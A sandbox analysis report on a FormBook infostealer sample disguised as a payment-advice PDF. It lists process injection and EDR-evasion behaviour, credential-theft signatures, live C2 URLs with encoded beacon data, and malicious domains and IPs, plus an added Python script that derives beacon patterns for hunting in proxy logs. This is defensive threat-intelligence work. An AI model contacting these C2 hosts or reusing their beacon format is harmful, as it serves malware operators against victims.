Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising
Initial Access: 2 Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application
Execution: 1 Native API; Scheduled Task/Job; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter
Persistence: 1 DLL Side-Loading; 2 Valid Accounts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
Privilege Escalation: 1 Exploitation for Privilege Escalation; 1 Abuse Elevation Control Mechanism; 1 DLL Side-Loading; 2 Valid Accounts; 21 Access Token Manipulation; 412 Process Injection; Startup Items; Scheduled Task/Job; At
Defense Evasion: 1 Disable or Modify Tools; 1 Deobfuscate/Decode Files or Information; 1 Abuse Elevation Control Mechanism; 3 Obfuscated Files or Information; 1 DLL Side-Loading; 2 Valid Accounts; 2 Virtualization/Sandbox Evasion; 21 Access Token Manipulation; 412 Process Injection
Credential Access: 1 OS Credential Dumping; 21 Input Capture; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow
Discovery: 2 System Time Discovery; 1 Account Discovery; 2 File and Directory Discovery; 116 System Information Discovery; 151 Security Software Discovery; 2 Virtualization/Sandbox Evasion; 3 Process Discovery; 1 Application Window Discovery; 1 System Owner/User Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections
Collection: 1 Archive Collected Data; 1 Data from Local System; 1 Email Collection; 21 Input Capture; 3 Clipboard Data; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged
Command and Control: 4 Ingress Tool Transfer; 1 Encrypted Channel; 4 Non-Application Layer Protocol; 4 Application Layer Protocol; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
Impact: 1 System Shutdown/Reboot; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
Behavior Graph ID: 1569491 | Sample: rPaymentAdviceNote_pdf.exe | Start date: 05/12/2024 | Architecture: WINDOWS | Score: 100

Start
  Signatures: Suricata IDS alerts for network traffic; Multi AV Scanner detection for submitted file; Yara detected FormBook; 4 other signatures
  DNS/IP: www.aziziyeescortg.xyz (Performs DNS queries to domains with low reputation); tempatmudisini06.click; 12 other IPs or domains
  -> rPaymentAdviceNote_pdf.exe (started)
       Signatures: Binary is likely a compiled AutoIt script file; Writes to foreign memory regions; Maps a DLL or memory area into another process; Switches to a custom stack to bypass stack traces
       -> svchost.exe (started)
            Signatures: Maps a DLL or memory area into another process
            -> lDBisuvfBkK.exe (injected)
                 Signatures: Found direct / indirect Syscall (likely to bypass EDR)
                 -> rasautou.exe (started)
                      Signatures: Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc); Modifies the context of a thread in another process (thread injection); 3 other signatures
                      -> lDBisuvfBkK.exe (injected)
                           Signatures: Found direct / indirect Syscall (likely to bypass EDR)
                           DNS/IP: tempatmudisini06.click 103.21.221.4, ports 49988, 49989, 49990, LINKNET-ID-APLinknetASNID, unknown; www.aziziyeescortg.xyz 104.21.77.71, ports 49753, 80, CLOUDFLARENETUS, United States; 6 other IPs or domains
                      -> firefox.exe (started)

Source | Detection | Scanner | Label
rPaymentAdviceNote_pdf.exe | 34% | ReversingLabs | Win32.Trojan.AutoitInject
rPaymentAdviceNote_pdf.exe | 100% | Joe Sandbox ML |
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
Source | Detection | Scanner | Label
https://support.lolipop.jp/hc/ja/articles/360049132953 | 0% | Avira URL Cloud | safe
http://www.tempatmudisini06.click/0kli/ | 0% | Avira URL Cloud | safe
http://www.sankan-fukushi.info/21k5/?wVb0=fWbmkZjyrmfBp888CcG5P/tv6YAygrCJWn0G2JrBW+aKnevZKbpm6U1ITTXCtKXlDFd/bcpJLIqCcWUwrjM1A4LwPHwyvUagu3NR6s+1WMK3FQ8gyne1SqlHaV7MI3WrY5r02MQ5JkbW&0r=XzjtrBPP | 0% | Avira URL Cloud | safe
http://www.questmatch.pro/ipd6/?wVb0=MAf2oATgQW2BddVfADsXf+wCIFqkr7SFGuPP0SlPqjR1OOKK8KBvL1kFaoovUHshjlod7xBKsGH7WboeoPfL5tpttEQTjebBZLDP1C5B1+B2izjL5y+kFvtZcDEbY8V81qhugw9f9kl5&0r=XzjtrBPP | 0% | Avira URL Cloud | safe
http://www.conansog.shop/m7wz/ | 0% | Avira URL Cloud | safe
http://assets.lolipop.jp/img/bnr/bnr_lolipop_ad_001.gif | 0% | Avira URL Cloud | safe
https://www.grandesofertas.fun/5rfk/?wVb0=sD5zUlt3wbrvSr53X/LgfhW | 0% | Avira URL Cloud | safe
https://minne.com/?utm_source=lolipop&utm_medium=banner&utm_campaign=synergy&utm_content=404 | 0% | Avira URL Cloud | safe
http://www.questmatch.pro/ipd6/ | 0% | Avira URL Cloud | safe
http://www.aziziyeescortg.xyz/wbcb/?wVb0=RE7vYLyK5TU4QOP5rF5bzHvmkOBzPkLWFqcdQsIlKut3OUPHwC3RgbbGtWJhBdiGOnYKFKB5mJuPEPmtM8O0K3O6A/B6pmA5xGmAOUvp0kuEyHznIJjgzI6sNmSk1vDMl2v3exemO24i&0r=XzjtrBPP | 0% | Avira URL Cloud | safe
http://www.tempatmudisini06.click/0kli/?wVb0=Fegsvl+OGDJHKeUkviVqrWXmfitRVJjJzbj1DgnmRmeFZ5KITSJ35O+CNkAnveOy+X8wGwFlf4nSYcZPMr6/ALB9HdTqqkiH2QBnBPtm52OUHeYVRkXu0orA8o5vf7k6+C2EbfsSUCNF&0r=XzjtrBPP | 0% | Avira URL Cloud | safe
https://pepabo.com/ | 0% | Avira URL Cloud | safe
http://www.beythome.online/80gy/ | 0% | Avira URL Cloud | safe
http://www.beythome.online/80gy/?wVb0=aoPUcaSQDoEYl3Li+4Czyu/3g+fbTJot1NLErCBtTlAsQjsNV1cN7WJnCGjlbK4CrVmsUH1zx16cR6YNnzS2sPuaP2IeA1YIjk+zZLMvVudzffalj3pTsEAkrCqDu4c/9ECDd62vUbZW&0r=XzjtrBPP | 0% | Avira URL Cloud | safe
http://www.conansog.shop/m7wz/?wVb0=k3rxT2/5CoW37253fqeJ2GQ6srVb5CIz6HeAuhy5mTu7sK1SIq+qIwOPP+2nE63N1XqW2uYy0GjlFOwlbRaUhItXSR0DNFdPvSJbxiH35Vlkry1kHcbP6o4IkfKAx2mWTolkC1NZH4oP&0r=XzjtrBPP | 0% | Avira URL Cloud | safe
http://www.sankan-fukushi.info/21k5/ | 0% | Avira URL Cloud | safe
http://www.callyur.shop | 0% | Avira URL Cloud | safe
http://www.grandesofertas.fun/5rfk/ | 0% | Avira URL Cloud | safe
http://www.grandesofertas.fun/5rfk/?wVb0=sD5zUlt3wbrvSr53X/LgfhW+OptFCrWooNx2zE35RlOZ6Ff5bUgKRp+BgbOlYXfZZMl91myXHSHWgEoZCPkWwkB1wGODpj+x1UAb80+hCsFXkgAnUr413w2hk7wj/03GtdXjGHp26G6Z&0r=XzjtrBPP | 0% | Avira URL Cloud | safe
http://www.callyur.shop/hayl/ | 0% | Avira URL Cloud | safe
https://static.minne.com/files/banner/minne_600x500 | 0% | Avira URL Cloud | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
ssl.goentri.com | 13.248.221.243 | true | true | | unknown
www.aziziyeescortg.xyz | 104.21.77.71 | true | true | | unknown
www.questmatch.pro | 104.21.62.184 | true | false | | high
www.conansog.shop | 104.21.41.74 | true | false | | high
tempatmudisini06.click | 103.21.221.4 | true | true | | unknown
natroredirect.natrocdn.com | 85.159.66.93 | true | false | | high
www.sankan-fukushi.info | 163.44.185.183 | true | false | | high
callyur.shop | 66.29.137.10 | true | true | | unknown
www.callyur.shop | unknown | unknown | false | | unknown
www.beythome.online | unknown | unknown | false | | unknown
www.grandesofertas.fun | unknown | unknown | false | | unknown
www.tempatmudisini06.click | unknown | unknown | false | | unknown
Name | Malicious | Antivirus Detection | Reputation
http://www.tempatmudisini06.click/0kli/ | true | Avira URL Cloud: safe | unknown
http://www.sankan-fukushi.info/21k5/?wVb0=fWbmkZjyrmfBp888CcG5P/tv6YAygrCJWn0G2JrBW+aKnevZKbpm6U1ITTXCtKXlDFd/bcpJLIqCcWUwrjM1A4LwPHwyvUagu3NR6s+1WMK3FQ8gyne1SqlHaV7MI3WrY5r02MQ5JkbW&0r=XzjtrBPP | true | Avira URL Cloud: safe | unknown
http://www.aziziyeescortg.xyz/wbcb/?wVb0=RE7vYLyK5TU4QOP5rF5bzHvmkOBzPkLWFqcdQsIlKut3OUPHwC3RgbbGtWJhBdiGOnYKFKB5mJuPEPmtM8O0K3O6A/B6pmA5xGmAOUvp0kuEyHznIJjgzI6sNmSk1vDMl2v3exemO24i&0r=XzjtrBPP | true | Avira URL Cloud: safe | unknown
http://www.conansog.shop/m7wz/ | true | Avira URL Cloud: safe | unknown
http://www.questmatch.pro/ipd6/?wVb0=MAf2oATgQW2BddVfADsXf+wCIFqkr7SFGuPP0SlPqjR1OOKK8KBvL1kFaoovUHshjlod7xBKsGH7WboeoPfL5tpttEQTjebBZLDP1C5B1+B2izjL5y+kFvtZcDEbY8V81qhugw9f9kl5&0r=XzjtrBPP | true | Avira URL Cloud: safe | unknown
http://www.questmatch.pro/ipd6/ | true | Avira URL Cloud: safe | unknown
http://www.tempatmudisini06.click/0kli/?wVb0=Fegsvl+OGDJHKeUkviVqrWXmfitRVJjJzbj1DgnmRmeFZ5KITSJ35O+CNkAnveOy+X8wGwFlf4nSYcZPMr6/ALB9HdTqqkiH2QBnBPtm52OUHeYVRkXu0orA8o5vf7k6+C2EbfsSUCNF&0r=XzjtrBPP | true | Avira URL Cloud: safe | unknown
http://www.conansog.shop/m7wz/?wVb0=k3rxT2/5CoW37253fqeJ2GQ6srVb5CIz6HeAuhy5mTu7sK1SIq+qIwOPP+2nE63N1XqW2uYy0GjlFOwlbRaUhItXSR0DNFdPvSJbxiH35Vlkry1kHcbP6o4IkfKAx2mWTolkC1NZH4oP&0r=XzjtrBPP | true | Avira URL Cloud: safe | unknown
http://www.beythome.online/80gy/?wVb0=aoPUcaSQDoEYl3Li+4Czyu/3g+fbTJot1NLErCBtTlAsQjsNV1cN7WJnCGjlbK4CrVmsUH1zx16cR6YNnzS2sPuaP2IeA1YIjk+zZLMvVudzffalj3pTsEAkrCqDu4c/9ECDd62vUbZW&0r=XzjtrBPP | true | Avira URL Cloud: safe | unknown
http://www.beythome.online/80gy/ | true | Avira URL Cloud: safe | unknown
http://www.sankan-fukushi.info/21k5/ | true | Avira URL Cloud: safe | unknown
http://www.grandesofertas.fun/5rfk/ | true | Avira URL Cloud: safe | unknown
http://www.callyur.shop/hayl/ | true | Avira URL Cloud: safe | unknown
http://www.grandesofertas.fun/5rfk/?wVb0=sD5zUlt3wbrvSr53X/LgfhW+OptFCrWooNx2zE35RlOZ6Ff5bUgKRp+BgbOlYXfZZMl91myXHSHWgEoZCPkWwkB1wGODpj+x1UAb80+hCsFXkgAnUr413w2hk7wj/03GtdXjGHp26G6Z&0r=XzjtrBPP | true | Avira URL Cloud: safe | unknown
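Every C2 URL flagged malicious in the table above has the same shape: a single four-character directory, a wVb0 parameter carrying a unique base64-like blob, and a constant 0r=XzjtrBPP, while the URL-reputation scanner rates each of them "safe". That shared structure, not any single domain, is the durable indicator. The Python below is an added example, not code from Joe Sandbox or from any FormBook write-up: it derives the common query keys, the constant parameter and the path shape from the report's own URLs, then uses them to test further URLs such as proxy log entries. The function names, the path-shape heuristic and the two URLs under `__main__` are assumptions of the example.

```python
from collections import Counter
from typing import Dict, Tuple
from urllib.parse import urlsplit

# The full C2 URLs listed in this report (FormBook typically cycles through a
# list of candidate domains, most of them decoys, so no single host is the IOC).
CANDIDATE_URLS = [
    "http://www.sankan-fukushi.info/21k5/?wVb0=fWbmkZjyrmfBp888CcG5P/tv6YAygrCJWn0G2JrBW+aKnevZKbpm6U1ITTXCtKXlDFd/bcpJLIqCcWUwrjM1A4LwPHwyvUagu3NR6s+1WMK3FQ8gyne1SqlHaV7MI3WrY5r02MQ5JkbW&0r=XzjtrBPP",
    "http://www.questmatch.pro/ipd6/?wVb0=MAf2oATgQW2BddVfADsXf+wCIFqkr7SFGuPP0SlPqjR1OOKK8KBvL1kFaoovUHshjlod7xBKsGH7WboeoPfL5tpttEQTjebBZLDP1C5B1+B2izjL5y+kFvtZcDEbY8V81qhugw9f9kl5&0r=XzjtrBPP",
    "http://www.aziziyeescortg.xyz/wbcb/?wVb0=RE7vYLyK5TU4QOP5rF5bzHvmkOBzPkLWFqcdQsIlKut3OUPHwC3RgbbGtWJhBdiGOnYKFKB5mJuPEPmtM8O0K3O6A/B6pmA5xGmAOUvp0kuEyHznIJjgzI6sNmSk1vDMl2v3exemO24i&0r=XzjtrBPP",
    "http://www.tempatmudisini06.click/0kli/?wVb0=Fegsvl+OGDJHKeUkviVqrWXmfitRVJjJzbj1DgnmRmeFZ5KITSJ35O+CNkAnveOy+X8wGwFlf4nSYcZPMr6/ALB9HdTqqkiH2QBnBPtm52OUHeYVRkXu0orA8o5vf7k6+C2EbfsSUCNF&0r=XzjtrBPP",
    "http://www.beythome.online/80gy/?wVb0=aoPUcaSQDoEYl3Li+4Czyu/3g+fbTJot1NLErCBtTlAsQjsNV1cN7WJnCGjlbK4CrVmsUH1zx16cR6YNnzS2sPuaP2IeA1YIjk+zZLMvVudzffalj3pTsEAkrCqDu4c/9ECDd62vUbZW&0r=XzjtrBPP",
    "http://www.conansog.shop/m7wz/?wVb0=k3rxT2/5CoW37253fqeJ2GQ6srVb5CIz6HeAuhy5mTu7sK1SIq+qIwOPP+2nE63N1XqW2uYy0GjlFOwlbRaUhItXSR0DNFdPvSJbxiH35Vlkry1kHcbP6o4IkfKAx2mWTolkC1NZH4oP&0r=XzjtrBPP",
    "http://www.grandesofertas.fun/5rfk/?wVb0=sD5zUlt3wbrvSr53X/LgfhW+OptFCrWooNx2zE35RlOZ6Ff5bUgKRp+BgbOlYXfZZMl91myXHSHWgEoZCPkWwkB1wGODpj+x1UAb80+hCsFXkgAnUr413w2hk7wj/03GtdXjGHp26G6Z&0r=XzjtrBPP",
]


def raw_query(query: str) -> Dict[str, str]:
    """Split the query without URL-decoding: the payload is base64-like and
    parse_qsl would silently turn its '+' characters into spaces."""
    out: Dict[str, str] = {}
    for kv in query.split("&"):
        if kv:
            k, _, v = kv.partition("=")
            out[k] = v
    return out


def decompose(url: str):
    p = urlsplit(url)
    return p.hostname, p.path, raw_query(p.query)


def path_shape(path: str) -> Tuple[int, Tuple[int, ...]]:
    """Directory count and per-segment lengths, e.g. '/wbcb/' -> (1, (4,))."""
    segs = [s for s in path.split("/") if s]
    return len(segs), tuple(len(s) for s in segs)


def campaign_indicators(urls) -> dict:
    """Derive what all URLs share: query keys present everywhere, parameters
    whose value never changes, and the path shapes seen."""
    parsed = [decompose(u) for u in urls]
    common_keys = set.intersection(*(set(q) for _, _, q in parsed))
    constant: Dict[str, str] = {}
    for k in common_keys:
        vals = {q[k] for _, _, q in parsed}
        if len(vals) == 1:          # same value on every host: a campaign marker
            constant[k] = vals.pop()
    return {
        "hosts": sorted(h for h, _, _ in parsed),
        "common_query_keys": sorted(common_keys),
        "constant_params": constant,
        "path_shapes": Counter(path_shape(p) for _, p, _ in parsed),
    }


def is_beacon_candidate(url: str, ind: dict) -> bool:
    """Match a URL (e.g. from a proxy log) against the derived indicators."""
    _, path, q = decompose(url)
    if path_shape(path) not in ind["path_shapes"]:
        return False
    if not all(k in q for k in ind["common_query_keys"]):
        return False
    return all(q.get(k) == v for k, v in ind["constant_params"].items())


if __name__ == "__main__":
    ind = campaign_indicators(CANDIDATE_URLS)
    print(ind["common_query_keys"], ind["constant_params"], dict(ind["path_shapes"]))
    # Assumed proxy-log lines: a host from this report's DNS table, and a benign search URL.
    print(is_beacon_candidate("http://www.callyur.shop/hayl/?wVb0=abcd&0r=XzjtrBPP", ind))
    print(is_beacon_candidate("https://duckduckgo.com/ac/?q=test", ind))
```

The constant parameter name and value are specific to this build's configuration and will change between campaigns, so the derivation should be rerun per sample rather than the literal `0r=XzjtrBPP` being pinned in a rule; the four-character directory plus two-parameter shape is the part that tends to survive across FormBook samples and is the better candidate for a proxy-log hunt.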
Name | Source | Malicious | Antivirus Detection | Reputation
https://duckduckgo.com/chrome_newtab | rasautou.exe, 0000000B.00000002.3096876760.0000000007A4B000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://support.lolipop.jp/hc/ja/articles/360049132953 | rasautou.exe, 0000000B.00000002.3095003763.0000000005658000.00000004.10000000.00040000.00000000.sdmp, lDBisuvfBkK.exe, 0000000D.00000002.3094437803.0000000003308000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://duckduckgo.com/ac/?q= | rasautou.exe, 0000000B.00000002.3096876760.0000000007A4B000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://www.grandesofertas.fun/5rfk/?wVb0=sD5zUlt3wbrvSr53X/LgfhW | rasautou.exe, 0000000B.00000002.3095003763.00000000054C6000.00000004.10000000.00040000.00000000.sdmp, lDBisuvfBkK.exe, 0000000D.00000002.3094437803.0000000003176000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | rasautou.exe, 0000000B.00000002.3096876760.0000000007A4B000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://minne.com/?utm_source=lolipop&utm_medium=banner&utm_campaign=synergy&utm_content=404 | rasautou.exe, 0000000B.00000002.3095003763.0000000005658000.00000004.10000000.00040000.00000000.sdmp, lDBisuvfBkK.exe, 0000000D.00000002.3094437803.0000000003308000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | rasautou.exe, 0000000B.00000002.3096876760.0000000007A4B000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://assets.lolipop.jp/img/bnr/bnr_lolipop_ad_001.gif | rasautou.exe, 0000000B.00000002.3095003763.0000000005658000.00000004.10000000.00040000.00000000.sdmp, lDBisuvfBkK.exe, 0000000D.00000002.3094437803.0000000003308000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://lolipop.jp/ | rasautou.exe, 0000000B.00000002.3095003763.0000000005658000.00000004.10000000.00040000.00000000.sdmp, lDBisuvfBkK.exe, 0000000D.00000002.3094437803.0000000003308000.00000004.00000001.00040000.00000000.sdmp | false | | high
https://www.ecosia.org/newtab/ | rasautou.exe, 0000000B.00000002.3096876760.0000000007A4B000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://pepabo.com/ | rasautou.exe, 0000000B.00000002.3095003763.0000000005658000.00000004.10000000.00040000.00000000.sdmp, lDBisuvfBkK.exe, 0000000D.00000002.3094437803.0000000003308000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://ac.ecosia.org/autocomplete?q= | rasautou.exe, 0000000B.00000002.3096876760.0000000007A4B000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | rasautou.exe, 0000000B.00000002.3096876760.0000000007A4B000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://www.callyur.shop | lDBisuvfBkK.exe, 0000000D.00000002.3096255257.00000000050D9000.00000040.80000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://js.ad-stir.com/js/adstir.js?20130527 | rasautou.exe, 0000000B.00000002.3095003763.0000000005658000.00000004.10000000.00040000.00000000.sdmp, lDBisuvfBkK.exe, 0000000D.00000002.3094437803.0000000003308000.00000004.00000001.00040000.00000000.sdmp | false | | high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | rasautou.exe, 0000000B.00000002.3096876760.0000000007A4B000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://static.minne.com/files/banner/minne_600x500 | rasautou.exe, 0000000B.00000002.3095003763.0000000005658000.00000004.10000000.00040000.00000000.sdmp, lDBisuvfBkK.exe, 0000000D.00000002.3094437803.0000000003308000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                                                            • No. of IPs < 25%
                                                            • 25% < No. of IPs < 50%
                                                            • 50% < No. of IPs < 75%
                                                            • 75% < No. of IPs
IP | Domain | Country | ASN | ASN Name | Malicious
103.21.221.4 | tempatmudisini06.click | unknown | 9905 | LINKNET-ID-APLinknetASNID | true
163.44.185.183 | www.sankan-fukushi.info | Japan | 7506 | INTERQGMOInternetIncJP | false
104.21.77.71 | www.aziziyeescortg.xyz | United States | 13335 | CLOUDFLARENETUS | true
104.21.62.184 | www.questmatch.pro | United States | 13335 | CLOUDFLARENETUS | false
85.159.66.93 | natroredirect.natrocdn.com | Turkey | 34619 | CIZGITR | false
13.248.221.243 | ssl.goentri.com | United States | 16509 | AMAZON-02US | true
104.21.41.74 | www.conansog.shop | United States | 13335 | CLOUDFLARENETUS | false
66.29.137.10 | callyur.shop | United States | 19538 | ADVANTAGECOMUS | true
                                                            Joe Sandbox version:41.0.0 Charoite
                                                            Analysis ID:1569491
                                                            Start date and time:2024-12-05 19:38:04 +01:00
                                                            Joe Sandbox product:CloudBasic
                                                            Overall analysis duration:0h 9m 53s
                                                            Hypervisor based Inspection enabled:false
                                                            Report type:full
                                                            Cookbook file name:default.jbs
                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                            Run name:Run with higher sleep bypass
Number of analysed new started processes:18
                                                            Number of new started drivers analysed:0
                                                            Number of existing processes analysed:0
                                                            Number of existing drivers analysed:0
                                                            Number of injected processes analysed:2
                                                            Technologies:
                                                            • HCA enabled
                                                            • EGA enabled
                                                            • AMSI enabled
                                                            Analysis Mode:default
                                                            Analysis stop reason:Timeout
                                                            Sample name:rPaymentAdviceNote_pdf.exe
                                                            Detection:MAL
                                                            Classification:mal100.troj.spyw.evad.winEXE@7/3@10/8
                                                            EGA Information:
                                                            • Successful, ratio: 75%
                                                            HCA Information:
                                                            • Successful, ratio: 97%
                                                            • Number of executed functions: 49
                                                            • Number of non-executed functions: 277
                                                            Cookbook Comments:
                                                            • Found application associated with file extension: .exe
                                                            • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                                                            • Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored
                                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, sppsvc.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
                                                            • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                                                            • Execution Graph export aborted for target lDBisuvfBkK.exe, PID 7000 because it is empty
• Not all processes were analyzed, report is missing behavior information
                                                            • Report creation exceeded maximum time and may have missing disassembly code information.
                                                            • Report size exceeded maximum capacity and may have missing disassembly code.
                                                            • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                            • VT rate limit hit for: rPaymentAdviceNote_pdf.exe
                                                            No simulations
Match | Associated Sample Name / URL | Detection | Threat Name
103.21.221.4 | file.exe | malicious | FormBook
• www.tempatmudisini06.click/4iun/
103.21.221.4 | SWIFT COPY 0028_pdf.exe | malicious | FormBook
• www.tempatmudisini06.click/0kli/
103.21.221.4 | FOTO#U011eRAFLAR.exe | malicious | FormBook
• www.tempatmudisini06.click/kfzf/
103.21.221.4 | Z6s208B9QX.exe | malicious | FormBook
• www.tempatmudisini01.click/abla/
103.21.221.4 | -pdf.bat.exe | malicious | FormBook
• www.tempatmudisini01.click/iydt/
103.21.221.4 | UMOWA_PD.BAT.exe | malicious | FormBook, GuLoader
• www.tempatmudisini01.click/iydt/
103.21.221.4 | RFQ - HTS45785-24-0907I000.exe | malicious | FormBook
• www.tempatmudisini01.click/abla/
103.21.221.4 | Purchase Order_ AEPL-2324-1126.exe | malicious | FormBook
• www.tempatmudisini01.click/phdl/
103.21.221.4 | ncOLm62YLB.exe | malicious | FormBook
• www.tempatmudisini01.click/lybf/
103.21.221.4 | SecuriteInfo.com.Win32.Malware-gen.10660.18305.exe | malicious | FormBook
• www.tempatmudisini01.click/r9rj/
163.44.185.183 | Payment_Confirmation_pdf.exe | malicious | FormBook, PureLog Stealer
• www.sankan-fukushi.info/aayz/
163.44.185.183 | DO-COSU6387686280.pdf.exe | malicious | FormBook, PureLog Stealer
• www.sankan-fukushi.info/qq1e/
163.44.185.183 | IETC-24017.exe | malicious | FormBook, PureLog Stealer
• www.sankan-fukushi.info/9k5s/
163.44.185.183 | SWIFT COPY 0028_pdf.exe | malicious | FormBook
• www.sankan-fukushi.info/21k5/
163.44.185.183 | Item-RQF-9456786.exe | malicious | Unknown
• www.sankan-fukushi.info/p9qy/
163.44.185.183 | order I 018629.xlsx | malicious | FormBook
• www.hihoha-menu.com/g24i/?Ij=C5lZ/tNmDIazGhz+mgSCdtEua581lzsfl6vwo2v3mqTQwnv5rjnUBpQzMVK0NvbkQlVLQw==&0f=e0DHTPtxAZK
104.21.62.184 | payments.exe | malicious | FormBook
• www.questmatch.pro/z3ox/
Match | Associated Sample Name / URL | Detection | Threat Name
www.aziziyeescortg.xyz | SWIFT COPY 0028_pdf.exe | malicious | FormBook
• 188.114.96.3
natroredirect.natrocdn.com | lgkWBwqY15.exe | malicious | FormBook
• 85.159.66.93
natroredirect.natrocdn.com | SRT68.exe | malicious | FormBook
• 85.159.66.93
natroredirect.natrocdn.com | ek8LkB2Cgo.exe | malicious | FormBook
• 85.159.66.93
natroredirect.natrocdn.com | PO 4110007694.exe | malicious | FormBook
• 85.159.66.93
natroredirect.natrocdn.com | Latest advice payment.exe | malicious | FormBook
• 85.159.66.93
natroredirect.natrocdn.com | New Order.exe | malicious | FormBook
• 85.159.66.93
natroredirect.natrocdn.com | specification and drawing.exe | malicious | FormBook, PureLog Stealer
• 85.159.66.93
natroredirect.natrocdn.com | CCE 30411252024.exe | malicious | FormBook
• 85.159.66.93
natroredirect.natrocdn.com | OUTSTANDING BALANCE PAYMENT.exe | malicious | FormBook
• 85.159.66.93
natroredirect.natrocdn.com | TNT Express Delivery Consignment AWD 87993766479.vbs | malicious | FormBook
• 85.159.66.93
www.questmatch.pro | W3MzrFzSF0.exe | malicious | FormBook, PureLog Stealer
• 172.67.138.37
www.questmatch.pro | Quotation.exe | malicious | FormBook
• 172.67.138.37
www.questmatch.pro | payments.exe | malicious | FormBook
• 104.21.62.184
www.questmatch.pro | SWIFT COPY 0028_pdf.exe | malicious | FormBook
• 188.114.96.3
www.conansog.shop | TNT Express Delivery Consignment AWD 87993766479.vbs | malicious | FormBook
• 172.67.162.12
www.conansog.shop | Mandatory Notice for all December Leave and Vacation application.exe | malicious | FormBook
• 104.21.41.74
www.conansog.shop | SWIFT COPY 0028_pdf.exe | malicious | FormBook
• 172.67.162.12
www.conansog.shop | FOTO#U011eRAFLAR.exe | malicious | FormBook
• 104.21.41.74
ssl.goentri.com | CV Lic H&S Olivetti Renzo.exe | malicious | FormBook
• 13.248.221.243
ssl.goentri.com | CV Lic H&S Olivetti Renzo.exe | malicious | FormBook
• 76.223.74.74
ssl.goentri.com | SWIFT COPY 0028_pdf.exe | malicious | FormBook
• 76.223.74.74
ssl.goentri.com | Item-RQF-9456786.exe | malicious | Unknown
• 76.223.74.74
Match | Associated Sample Name / URL | Detection | Threat Name
CLOUDFLARENETUS | file.exe | malicious | LummaC Stealer
• 172.67.165.166
CLOUDFLARENETUS | ozctQoBg1o.exe | malicious | Snake Keylogger, VIP Keylogger
• 172.67.177.134
CLOUDFLARENETUS | SPhzvjk8wx.exe | malicious | Snake Keylogger, VIP Keylogger
• 104.21.67.152
CLOUDFLARENETUS | Q0Sh31btX8.exe | malicious | Snake Keylogger, VIP Keylogger
• 172.67.177.134
CLOUDFLARENETUS | o7H9XLUD9z.exe | malicious | Snake Keylogger, VIP Keylogger
• 104.21.67.152
CLOUDFLARENETUS | XE5p2qNoWt.exe | malicious | Lokibot, PureLog Stealer, zgRAT
• 104.21.12.202
CLOUDFLARENETUS | C9wUCfwfeT.exe | malicious | Lokibot, PureLog Stealer, zgRAT
• 104.21.73.230
CLOUDFLARENETUS | 764GVLyJne.exe | malicious | Snake Keylogger, VIP Keylogger
• 172.67.177.134
CLOUDFLARENETUS | lQyRqxe4dt.exe | malicious | Snake Keylogger, VIP Keylogger
• 172.67.177.134
